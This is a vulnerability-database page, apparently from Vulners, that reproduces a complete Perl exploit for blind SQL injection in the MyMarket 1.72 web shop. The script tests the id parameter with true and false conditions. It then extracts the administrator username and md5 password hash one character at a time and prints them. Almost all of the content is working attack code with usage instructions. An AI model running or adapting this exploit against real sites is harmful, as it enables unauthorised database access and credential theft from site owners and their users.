Vulners
Lucene search
MyMarket 1.72 Blind SQL Injection Exploit
#!/usr/bin/perl
######################
#
#MyMarket 1.72 Blind SQL Injection Exploit
#
######################
#
#Bug by: h0yt3r
#
#Demo: http://mymarket.sourceforge.net/demo/shopping/
#
##
###
##
#
#http://www.site.de/mymarket/shopping/?id=bluah
#Ok when we give $id an unexpected value like this we get an SQL Error.
#Union selecting seems not possible...
#Exploit needs a valid category id.
#The Password is in md5 so exploiting will take an awful lot of time.
#You will have to change the content on some sites if there are no categorys.
#So I couldnt make it to write a stable expl for all sites using this.
#
#SQL Injection:
#http://[target]/[path]/?id=[SQL]
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the foreverliving h4ck-y0u Team!
#
#######################
#######################
use LWP::UserAgent;
my $userAgent = LWP::UserAgent->new;
usage();
$server = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print"\n";
if (!$id) { die "Read Usage!\n"; }
$filename ="index.php";
my $vulnCheck = "http://".$server.$dir.$filename;
my $goodSite = $vulnCheck."?id=".$id." and 1=1";
my $badSite = $vulnCheck."?id=".$id." and 1=0";
print"[x]Connecting:";
my $Attack1= $userAgent->get($goodSite);
my $Attack2= $userAgent->get($badSite);
if($Attack1->is_success)
{
print " Connected \n";
print "[x]Vulnerable Check: ";
###Will change some times
if($Attack1->content !~ m/None /i && $Attack2->content =~ m/None/i)
{ print "Vulnerable \n"; }
else
{ print "Not Vulnerable"; exit;}
}
else
{
print " Connection Failed";
exit;
}
my $asciiNUM="";
my $length;
print "[x]Bruteforcing Length...(if this freezes you have to change the content)\n";
my $lengthCounter = 1;
while(1)
{
my $url = "".$vulnCheck."?id=".$id."%20and%20LENGTH((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1))=".$lengthCounter."";
my $Attack= $userAgent->get($url);
my $content = $Attack->content;
if($content =~ m/None/i)
{ $lengthCounter++; }
else
{ $length=$length.$lengthCounter; last; }
}
my @Daten = ("61","62","63","64","65","66","67","68","69","6A","6B","6C","6D","6E","6F","70","71","72","73","74","75","76","77","78","79","7A","3A","5F","31","32","33","34","35","36","37","38","39","30","21","23","2B","28","29","40","2D","F5","25","26","2F","3F");
print "[x]Injecting Black Magic...will take SOME time...\n";
for($b=1;$b<=$length;$b++)
{
for(my $u=0;$u<53;$u++)
{
my $url = "".$vulnCheck."?id=".$id."%20and%20substring((select%20concat(username,0x3a,password)%20from%20users%20limit%200,1),".$b.",1)=0x".$Daten[$u]."";
my $Attack= $userAgent->get($url);
my $content = $Attack->content;
if($content !~ m/None/i)
{
print "[x]Found Char ".$Daten[$u]."\n";
$hex=$hex.$Daten[$u];
last;
}
}
}
print "[x]Converting \n";
my $a_str = hex_to_ascii($hex);
@login = split(/\:/, $a_str);
print "[x]Success! \n";
print " Username: $login[0]\n";
print " Password: $login[1]";
sub hex_to_ascii ($)
{
(my $str = shift) =~ s/([a-fA-F0-9]{2})/chr(hex $1)/eg;
return $str;
}
sub usage()
{
print q
{
######################################################
MyMarket Remote Blind SQL Injection Exploit
-Written by h0yt3r-
Usage: MyMarket.pl [Server] [Path] [Category ID]
Sample:
perl MyMarket.pl www.site.com /shopping/ 1
######################################################
};
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jun 2008 00:00Current
7.1High risk
Vulners AI Score7.1